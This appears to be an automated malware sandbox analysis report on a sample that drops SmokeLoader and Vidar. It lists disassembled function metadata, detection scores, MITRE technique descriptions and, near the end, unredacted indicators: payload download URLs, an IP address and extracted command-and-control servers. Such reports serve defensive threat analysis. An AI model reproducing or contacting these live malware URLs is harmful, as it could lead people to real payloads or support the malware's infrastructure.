Function 027A0E97 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A0EA1
_memset.LIBCMT ref: 027A0EC8

Part of subcall function 027A810A: _malloc.LIBCMT ref: 027A8110
Part of subcall function 027A810A: _rand.LIBCMT ref: 027A8130

Part of subcall function 027A0D53: __EH_prolog3_GS.LIBCMT ref: 027A0D5A
Part of subcall function 027A0D53: _memset.LIBCMT ref: 027A0DA8

Strings

BC, xrefs: 027A0FE7
TC, xrefs: 027A0F64

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3__memset$_malloc_rand
String ID: BC$TC
API String ID: 3702070846-596238935
Opcode ID: 948bbc5a94c2932638ec4c278f098014434929afba408b200d20baa394d536c5
Instruction ID: 55f784861eec6d6309558d7dec08f991cba4f7729a4f40f2ca0e858e94b536eb
Opcode Fuzzy Hash: 948bbc5a94c2932638ec4c278f098014434929afba408b200d20baa394d536c5
Instruction Fuzzy Hash: B9613E36940218EBEB219F60EC09FD9BB35FB0A315F0005B5F509A1170DB725EA4EF49

Uniqueness

Uniqueness Score: -1.00%

Function 027A0B25 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 027A0B44
_memset.LIBCMT ref: 027A0BBC

Strings

C, xrefs: 027A0C78
PC, xrefs: 027A0B3F

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3_memset
String ID: PC$C
API String ID: 2828583354-1062002606
Opcode ID: 3c25ec2cb4bde56ec178900f5640ffa52456a003a45050e929f90e3576fc0db7
Instruction ID: b3faf9387a7c19898262a21dda537171d4973b291bc119afec5500958aa837a2
Opcode Fuzzy Hash: 3c25ec2cb4bde56ec178900f5640ffa52456a003a45050e929f90e3576fc0db7
Instruction Fuzzy Hash: 5D51E37290020E9FDF11DFA4DC94BEE73B9FF49324F104A29E911A7280DB75AA19CB54

Uniqueness

Uniqueness Score: -1.00%

Function 027A6CA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 027A6CBF

Part of subcall function 027AF405: std::exception::exception.LIBCMT ref: 027AF41A
Part of subcall function 027AF405: __CxxThrowException@8.LIBCMT ref: 027AF42F
Part of subcall function 027AF405: std::exception::exception.LIBCMT ref: 027AF440

__EH_prolog3_catch.LIBCMT ref: 027A6D00
std::_Xinvalid_argument.LIBCPMT ref: 027A6D16

Strings

DXC, xrefs: 027A6CFB

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: DXC
API String ID: 2448322171-358955896
Opcode ID: a18c1fb711bd4a7b5e59d1f34900c39856c5e774d14fd43cfb9c9aad553ae1de
Instruction ID: 2e7c661da9fc575fd8debd35e601ea6dc4d8b3e93dfba37d81ff9f77723ffdb8
Opcode Fuzzy Hash: a18c1fb711bd4a7b5e59d1f34900c39856c5e774d14fd43cfb9c9aad553ae1de
Instruction Fuzzy Hash: 5921F97A7412018BCF19EE7EC9A9A6DB2E7EFC4720F24493DE152D7290EE71D8408B10

Uniqueness

Uniqueness Score: -1.00%

Function 027C296E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 027C2994

Part of subcall function 027C27C0: __fltout2.LIBCMT ref: 027C27EB

__cftog_l.LIBCMT ref: 027C29BA
__cftoe_l.LIBCMT ref: 027C29EC

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: ad9099471b92f0389a3bd09947a0b927c7c328c166ff5b5e6cf6287d4b0af8c2
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: C411397200414ABBCF165EA8DC458EE3F67BB08354B698419FE1869032D736C5B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 027B6D32 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 027B6D3E

Part of subcall function 027B76DC: __getptd_noexit.LIBCMT ref: 027B76DF
Part of subcall function 027B76DC: __amsg_exit.LIBCMT ref: 027B76EC

__amsg_exit.LIBCMT ref: 027B6D5E
__lock.LIBCMT ref: 027B6D6E
_free.LIBCMT ref: 027B6D9E

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: f7920005845d6790d2fa98f9664e3d310f3930ee3bf903dda2f29bdb34f1b4a9
Instruction ID: 9a40265314986c6c63590c5e47fa2da8b5d7f7e84986d4bf3f59908ed16265c1
Opcode Fuzzy Hash: f7920005845d6790d2fa98f9664e3d310f3930ee3bf903dda2f29bdb34f1b4a9
Instruction Fuzzy Hash: E6019236905B21EBDF27AF2BD8087DD7765BF05728F054015EA00A7690CB34A541CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 027B06D1 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 027B06EB

Part of subcall function 027AFF49: __FF_MSGBANNER.LIBCMT ref: 027AFF62
Part of subcall function 027AFF49: __NMSG_WRITE.LIBCMT ref: 027AFF69

std::exception::exception.LIBCMT ref: 027B0720
std::exception::exception.LIBCMT ref: 027B073A
__CxxThrowException@8.LIBCMT ref: 027B074B

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: e1053b8546613150c87f0c81a34657891735d1a374cd9de82723e254c659f939
Instruction ID: e143b88d75607b9d0348ca2532add8194838bda0155f96eda5c010fb2c0e1c4a
Opcode Fuzzy Hash: e1053b8546613150c87f0c81a34657891735d1a374cd9de82723e254c659f939
Instruction Fuzzy Hash: A9F02830901319AFEB17FB64EC19BDF7AE6AF86718F10402EE804A6190CFB18601DF58

Uniqueness

Uniqueness Score: -1.00%

Function 027A6BC4 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 027A6BCB
std::_Mutex::_Mutex.LIBCPMT ref: 027A6BDC

Part of subcall function 027B06D1: _malloc.LIBCMT ref: 027B06EB

std::locale::_Init.LIBCPMT ref: 027A6BF3

Part of subcall function 027AF939: __EH_prolog3.LIBCMT ref: 027AF940
Part of subcall function 027AF939: std::_Lockit::_Lockit.LIBCPMT ref: 027AF956
Part of subcall function 027AF939: std::locale::_Locimp::_Locimp.LIBCPMT ref: 027AF978
Part of subcall function 027AF939: std::locale::_Setgloballocale.LIBCPMT ref: 027AF982
Part of subcall function 027AF939: _Yarn.LIBCPMT ref: 027AF998
Part of subcall function 027AF939: std::locale::facet::_Incref.LIBCPMT ref: 027AF9A5

std::locale::facet::_Incref.LIBCPMT ref: 027A6C01

Part of subcall function 027A04F6: std::_Lockit::_Lockit.LIBCPMT ref: 027A0502

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: std::_std::locale::_$H_prolog3IncrefLockitLockit::_std::locale::facet::_$InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
String ID:
API String ID: 3596770912-0
Opcode ID: bc151e60dab02189c4cfd6f936035235473210fab6976747d4da00a5ec2cedd8
Instruction ID: 40e7283ddfe05df962bddcb7fc09261721a43549b5859c2fdd4833d07f30cae5
Opcode Fuzzy Hash: bc151e60dab02189c4cfd6f936035235473210fab6976747d4da00a5ec2cedd8
Instruction Fuzzy Hash: D9F092766016029BDB13BFB8846C79EB297BFD0B34F29460AC5419F650DF74A9018F06

Uniqueness

Uniqueness Score: -1.00%

Function 0279A1E2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 253COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0279A394

Strings

:, xrefs: 0279A426
\, xrefs: 0279A414

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __fassign
String ID: :$\
API String ID: 3965848254-1166558509
Opcode ID: fc12d2fec4372ab12b07535998e3cef3417ff924e95e2b085267a1398c78bfed
Instruction ID: a22afa29ef5f33f9174c4626cc0f29bf05bccf0aae3af23d55c3a34e4a390f47
Opcode Fuzzy Hash: fc12d2fec4372ab12b07535998e3cef3417ff924e95e2b085267a1398c78bfed
Instruction Fuzzy Hash: 5DA1A231901718DFDF26DF28E8887E9B7B9BB05314F1401D9E918A72A0D771AE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 027A1FA8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 027A1FE3

Part of subcall function 027A810A: _malloc.LIBCMT ref: 027A8110
Part of subcall function 027A810A: _rand.LIBCMT ref: 027A8130

_memset.LIBCMT ref: 027A202E

Strings

BC, xrefs: 027A1FBF

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$_malloc_rand
String ID: BC
API String ID: 963433291-447861928
Opcode ID: 9ada28bb842ac3f110ec878264a1abcd46b5fdd8cbfb29edd7769905b0467765
Instruction ID: 0d3c33ce34934272fcb19f806ef6ff7f7d572818af44abfbc4fd62ccdde1333c
Opcode Fuzzy Hash: 9ada28bb842ac3f110ec878264a1abcd46b5fdd8cbfb29edd7769905b0467765
Instruction Fuzzy Hash: 87817F76980218ABDB215FA0EC4DFDABB78FF0D311F1404E5F60AE1161D7798AA09F19

Uniqueness

Uniqueness Score: -1.00%

Function 027A1D0C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 027A1D54

Part of subcall function 027A084A: _memset.LIBCMT ref: 027A0886

Strings

TC, xrefs: 027A1DFD
BC, xrefs: 027A1D2D

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset
String ID: BC$TC
API String ID: 2102423945-596238935
Opcode ID: 882c5e8ca54285f8de50f604590a9ee31e211167632930c259604e57d499d94f
Instruction ID: 70250eb0e63f713f809c4005f8dfed318d44f72f74b617bba863afda0639e641
Opcode Fuzzy Hash: 882c5e8ca54285f8de50f604590a9ee31e211167632930c259604e57d499d94f
Instruction Fuzzy Hash: C361497A480148AFEB219FA0EC4CDAA7B7AFB4B315B140539F50593161DB724C29EF1A

Uniqueness

Uniqueness Score: -1.00%

Function 027A2447 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 027A248A

Part of subcall function 027A810A: _malloc.LIBCMT ref: 027A8110
Part of subcall function 027A810A: _rand.LIBCMT ref: 027A8130

_memset.LIBCMT ref: 027A24D3

Strings

BC, xrefs: 027A245E

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$_malloc_rand
String ID: BC
API String ID: 963433291-447861928
Opcode ID: 969b5e0c404e8f83ca44dc4736cc510618e359adfe8d55345f12cb22b666f6d3
Instruction ID: d14bd28bcb81214d7e8b81bc3aeba949d00565f12eb4578d2ec5ae64bd1f2865
Opcode Fuzzy Hash: 969b5e0c404e8f83ca44dc4736cc510618e359adfe8d55345f12cb22b666f6d3
Instruction Fuzzy Hash: 3E418E76940218ABDB119FA4EC4DEDEBBBCBF0E310F0005E5F605E2161DB759A908F59

Uniqueness

Uniqueness Score: -1.00%

Function 027A86B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 027A86D4

Part of subcall function 027A85F3: _memset.LIBCMT ref: 027A8634

_memset.LIBCMT ref: 027A87B1

Strings

|D, xrefs: 027A87CF

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$H_prolog3
String ID: |D
API String ID: 2144794740-47806182
Opcode ID: 4a4d2ffe77f3461ae67d7cd8c5dc3b4a7a0c71858aff66e68c984d6089c90285
Instruction ID: a7f398c22246b5b0fbb3994a2eb8ed7b45de791878ad69618f7569f6eb0d2294
Opcode Fuzzy Hash: 4a4d2ffe77f3461ae67d7cd8c5dc3b4a7a0c71858aff66e68c984d6089c90285
Instruction Fuzzy Hash: 1E4190B2901248AFDB26EFA8DD88FDE7BADEF15310F10411AF50AA3150EB745709CB65

Uniqueness

Uniqueness Score: -1.00%

Function 027A22B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 027A22F5

Part of subcall function 027A810A: _malloc.LIBCMT ref: 027A8110
Part of subcall function 027A810A: _rand.LIBCMT ref: 027A8130

_memset.LIBCMT ref: 027A233E

Strings

BC, xrefs: 027A22CB

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _memset$_malloc_rand
String ID: BC
API String ID: 963433291-447861928
Opcode ID: a4db762fbda3d7f2f7eb6a515f829c33534d682a649eed2b2ff932b9bc77f7f1
Instruction ID: f6413256755224be17c187c0e9aa4521094a974cd1b015c702e449e6ee22c226
Opcode Fuzzy Hash: a4db762fbda3d7f2f7eb6a515f829c33534d682a649eed2b2ff932b9bc77f7f1
Instruction Fuzzy Hash: 01418176840118ABDB11AFA4EC4DEDE7BBCFF0E310F1005A5F605E2161DB759A908F59

Uniqueness

Uniqueness Score: -1.00%

Function 027A3903 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 027A390A
_strcpy_s.LIBCMT ref: 027A39EC

Strings

~SC, xrefs: 027A3905

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3__strcpy_s
String ID: ~SC
API String ID: 932828528-3748496117
Opcode ID: c80da1b88ae5e6f629ba228c024f1964c26b71b6cbff883f343705eafacf5390
Instruction ID: b0c3e944115194ca2b1c6e82e2899620b57064dd5936784032a646506694c569
Opcode Fuzzy Hash: c80da1b88ae5e6f629ba228c024f1964c26b71b6cbff883f343705eafacf5390
Instruction Fuzzy Hash: D231CD329003099FEB05DFB4DC58BDE77B9BF4A314F100269E901EB290DB71AA05CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0279D251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0279D258

Part of subcall function 0279CAD7: __EH_prolog3.LIBCMT ref: 0279CAF6

_strtok.LIBCMT ref: 0279D314

Strings

OYC, xrefs: 0279D253

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3H_prolog3__strtok
String ID: OYC
API String ID: 864803198-2876888
Opcode ID: fd54b2f790621b1915d25b6013fdf3569f17e29a56aee35f188c22ef3895ede0
Instruction ID: cf0f1b5015c37ef8bee4dc812893d4e65be3f8fb99ad5cba10ddd2132af8bfff
Opcode Fuzzy Hash: fd54b2f790621b1915d25b6013fdf3569f17e29a56aee35f188c22ef3895ede0
Instruction Fuzzy Hash: 4F316EB1C00208DADF12EFE8D849ADEBBB9EF09304F508529E815A3254DB319A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02793BF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02793BF7

Part of subcall function 027938C2: __EH_prolog3.LIBCMT ref: 027938E1

Part of subcall function 027A8159: __EH_prolog3_GS.LIBCMT ref: 027A8163
Part of subcall function 027A8159: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 027A8266

Strings

TC, xrefs: 02793C16
>_C, xrefs: 02793BF2

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3_$H_prolog3Ios_base_dtorstd::ios_base::_
String ID: >_C$TC
API String ID: 4018024541-1443989463
Opcode ID: 90ba45217b618d2d9e2094a0d2775a12dec6ab93572534733f3e537a0f09e258
Instruction ID: f1e17e41b9068c75795861273054bf39efc594ad439ebc13c3a1e7fb33a43a32
Opcode Fuzzy Hash: 90ba45217b618d2d9e2094a0d2775a12dec6ab93572534733f3e537a0f09e258
Instruction Fuzzy Hash: EB214935911218EFDF069FA4EC88D9DBBB6FF06309B4400B5E501A61B1D7728D44EF55

Uniqueness

Uniqueness Score: -1.00%

Function 0279A557 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0279A55E

Part of subcall function 027B06D1: _malloc.LIBCMT ref: 027B06EB

Strings

][C, xrefs: 0279A559
BC, xrefs: 0279A59F

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3_malloc
String ID: BC$][C
API String ID: 2346879263-3725132966
Opcode ID: bf2bb8883f791573ca3793c169ce9a713c497f8afca6aa9c62144d6d4be9cd7e
Instruction ID: aa7b7d4dc53db8f1299610b4ee68196b7c52dfeb9782b9d102c5783e7f704afa
Opcode Fuzzy Hash: bf2bb8883f791573ca3793c169ce9a713c497f8afca6aa9c62144d6d4be9cd7e
Instruction Fuzzy Hash: BC11D631A02B219FDB226F34A80839ABFA1AF01B34F25471DD9A99B1E1DF744A11CF54

Uniqueness

Uniqueness Score: -1.00%

Function 027AAB1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 027AAB23
_localeconv.LIBCMT ref: 027AAB2B

Part of subcall function 027B20BE: __getptd.LIBCMT ref: 027B20BE

Part of subcall function 027AFD23: ____lc_handle_func.LIBCMT ref: 027AFD26
Part of subcall function 027AFD23: ____lc_codepage_func.LIBCMT ref: 027AFD2E

Strings

BC, xrefs: 027AAB45

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch____lc_codepage_func____lc_handle_func__getptd_localeconv
String ID: BC
API String ID: 2930029256-447861928
Opcode ID: 4b4fbe61858df8a043364572b7d1205f4f2d091c6310b07f075b9cf1dc98422b
Instruction ID: 041c11f5f9f4655806fa94a40bddd1298c19844d595876c67b4080f5294443cf
Opcode Fuzzy Hash: 4b4fbe61858df8a043364572b7d1205f4f2d091c6310b07f075b9cf1dc98422b
Instruction Fuzzy Hash: 5A012C74C06B848EC723FF799428209BBF26F44364B04DA69C5A58BB11DB79E504CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 027B47BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 027B47CE

Part of subcall function 027B76DC: __getptd_noexit.LIBCMT ref: 027B76DF
Part of subcall function 027B76DC: __amsg_exit.LIBCMT ref: 027B76EC

__getptd.LIBCMT ref: 027B47DC

Strings

csm, xrefs: 027B47EA

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 63aaa5f2255af7176f9dce91265a9936938b179a1c22811c6f269a2d4cae37da
Instruction ID: 18c220b06cc8fd4cb7af2c87ee2b1b3cf18536b2499bba492a94f14424097030
Opcode Fuzzy Hash: 63aaa5f2255af7176f9dce91265a9936938b179a1c22811c6f269a2d4cae37da
Instruction Fuzzy Hash: 45014B358022958ECF3B9F28D8757ECB3B6BF14215F64482EE4885B692DB308591CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0279C365 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_strtok_s.LIBCMT ref: 0279C377
_strtok_s.LIBCMT ref: 0279C3AA

Strings

D, xrefs: 0279C36E

Memory Dump Source

Source File: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Offset: 02790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2790000_7791.jbxd

Yara matches

Similarity

API ID: _strtok_s
String ID: D
API String ID: 3897208846-1145219676
Opcode ID: 88dc42c60fc6e7a1b13d4a466e852b22c65c1696291e99670de8b1279968bdd1
Instruction ID: bce2a7269b46804d695b998dfa5191b4d6ad255e026b1dcab19639932cc249a5
Opcode Fuzzy Hash: 88dc42c60fc6e7a1b13d4a466e852b22c65c1696291e99670de8b1279968bdd1
Instruction Fuzzy Hash: 56F0FEB2500109BBDF039E81ED05FDB3F6EEF08354F004011FE08A00A1E272DE609B95

Uniqueness

Uniqueness Score: -1.00%

Source: http://piratia.su/tmp/	Avira URL Cloud: Label: malware
Source: http://159.69.101.170/4798399205.zip	Avira URL Cloud: Label: malware
Source: http://159.69.101.170/	Avira URL Cloud: Label: malware
Source: http://159.69.101.170/4798399205.zip/1415	Avira URL Cloud: Label: malware
Source: https://amarillavida.com/upload/chrome.exe	Avira URL Cloud: Label: malware
Source: http://mupsin.ru/tmp/	Avira URL Cloud: Label: malware
Source: http://159.69.101.170/1415	Avira URL Cloud: Label: malware
Source: http://linislominyt11.at/	Avira URL Cloud: Label: malware
Source: http://diewebseite.at/tmp/	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\5D03.dll	ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\7791.exe	ReversingLabs: Detection: 69%

Source: C:\Users\user\AppData\Roaming\efthhbi	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7791.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hcthhbi	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5D03.dll	Joe Sandbox ML: detected

Source: 00000016.00000002.485561355.0000000000C80000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://piratia.su/tmp/", "http://piratia-life.ru/tmp/", "http://diewebseite.at/tmp/", "http://faktync.com/tmp/", "http://mupsin.ru/tmp/", "http://aingular.com/tmp/", "http://mordo.ru/tmp/"]}
Source: 29.3.7791.exe.27e0000.0.raw.unpack	Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/ch_inagroup", "https://mastodon.social/@olegf9844e"]}

Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then into	22_2_00C614E1
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then call FFFFFFFFFF57121Ch	22_2_00C61BE9
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then call FFFFFFFFFF57121Ch	22_2_00C61BF6
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then jnp 00C61D6Fh	22_2_00C61DAD
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then jnp 00C62135h	22_2_00C621BA
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then call FFFFFFFFFF57121Ch	22_2_00C61C00
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then jnp 00C62135h	22_2_00C6211C
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then call FFFFFFFFFF57121Ch	22_2_00C61C1A
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then jnp 00C62135h	22_2_00C62123
Source: C:\Users\user\AppData\Local\Temp\900B.exe	Code function: 4x nop then jnp 00C62135h	22_2_00C6212F

Source: hOdgEiePTe.exe	Virustotal: Detection: 59%	Perma Link
Source: hOdgEiePTe.exe	Metadefender: Detection: 37%	Perma Link
Source: hOdgEiePTe.exe	ReversingLabs: Detection: 80%

Source: Malware configuration extractor	URLs: http://piratia.su/tmp/
Source: Malware configuration extractor	URLs: http://piratia-life.ru/tmp/
Source: Malware configuration extractor	URLs: http://diewebseite.at/tmp/
Source: Malware configuration extractor	URLs: http://faktync.com/tmp/
Source: Malware configuration extractor	URLs: http://mupsin.ru/tmp/
Source: Malware configuration extractor	URLs: http://aingular.com/tmp/
Source: Malware configuration extractor	URLs: http://mordo.ru/tmp/
Source: Malware configuration extractor	URLs: https://t.me/ch_inagroup
Source: Malware configuration extractor	URLs: https://mastodon.social/@olegf9844e

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: BRM-ASUZ BRM-ASUZ

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 159.69.101.170 159.69.101.170
Source: Joe Sandbox View	IP Address: 195.158.3.162 195.158.3.162

Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
